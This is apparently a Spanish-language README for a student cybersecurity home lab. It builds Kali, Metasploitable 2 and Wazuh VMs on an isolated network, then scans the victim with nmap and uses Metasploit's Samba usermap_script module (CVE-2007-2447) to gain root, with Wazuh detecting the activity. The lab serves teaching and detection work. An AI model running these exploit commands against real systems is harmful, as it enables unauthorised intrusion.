
Laboratorio de ataque AD/Linux aislado: explotó CVE-2007-2447 mediante Metasploit, detectado con Wazuh SIEM mapeado a MITRE ATT&CK (T1190, T1059)
Proyecto B.Tech (BTP) | IIIT Pune Basado en: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi
Un laboratorio doméstico de ciberseguridad totalmente funcional construido en una sola máquina con herramientas gratuitas y de código abierto. El laboratorio simula un ciclo de vida de ataque real — Reconocimiento → Explotación → Detección — y demuestra cómo un SIEM puede detectar y mapear ataques al framework MITRE ATT&CK en tiempo real.
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
Crea una Red Interna llamada cyberlab en VirtualBox. Las tres VMs reciben este adaptador. La VM Ubuntu/Wazuh recibe un Adaptador Solo-Anfitrión adicional para que puedas acceder al dashboard desde tu navegador.
cyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Nunca expongas Metasploitable 2 a internet. Es inseguro a propósito.
cyberlab + Solo-Anfitrión/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (desde el navegador del host)Dado que Metasploitable 2 no puede ejecutar un agente de Wazuh, configura el reenvío de syslog para un monitoreo sin agente:
En Metasploitable, añade a /etc/rsyslog.conf:
*.* @10.0.0.3:514
En Wazuh (Ubuntu), habilita la entrada de syslog en /var/ossec/etc/ossec.conf:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Reinicia Wazuh: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Servicios clave descubiertos en Metasploitable 2:
Se descubrieron más de 20 puertos abiertos. Huella del SO identificada: Linux 2.6.x
Vulnerabilidad: CVE-2007-2447 — Inyección de comandos usermap_script de Samba
Permite la ejecución remota de código sin autenticación mediante solicitudes MS-RPC malformadas en Samba 3.0.0–3.0.25rc3.
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
Después de la explotación, Wazuh detectó automáticamente los eventos y los mapeó a MITRE ATT&CK:
Total de eventos detectados: 55+
Accede al dashboard en https://192.168.56.103 → Eventos de Seguridad → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
Este laboratorio está construido íntegramente con máquinas virtuales aisladas, sin acceso a internet durante las simulaciones de ataque. Todas las herramientas y técnicas se utilizan estrictamente con fines educativos dentro de un entorno controlado. No intentes replicar ninguna técnica de ataque en sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de pruebas.
Presentado por Harshita Verma | IIIT Pune
| VM | Rol | IP | Herramientas |
|---|
| Kali Linux 2026.1 | Atacante | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | Víctima | 10.0.0.2 | 20+ vulnerabilidades |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
| Herramienta | Versión | Propósito |
|---|
| VirtualBox | 7.x | Hipervisor — ejecuta todas las VMs en un solo host |
| Kali Linux | 2026.1 | SO de pruebas de penetración (ofensivo) |
| Metasploitable 2 | v2.0 | Objetivo deliberadamente vulnerable |
| Wazuh | v4.7.5 | SIEM de código abierto (defensivo) |
| Nmap | Última | Escaneo de red/puertos |
| Metasploit Framework | Última | Framework de explotación |
| Puerto | Servicio | Versión |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| ID de Regla | Descripción | Técnica MITRE | Táctica |
|---|
| 5402 | Ejecución exitosa de sudo a ROOT | T1548.003 | Escalada de Privilegios |
| 5501 | PAM: Sesión de inicio abierta | T1078 | Acceso Inicial / Persistencia |
| 5502 | PAM: Sesión de inicio cerrada | T1078 | Evasión de Defensas |
| 502 | Servidor Wazuh iniciado | — | Detección Activa |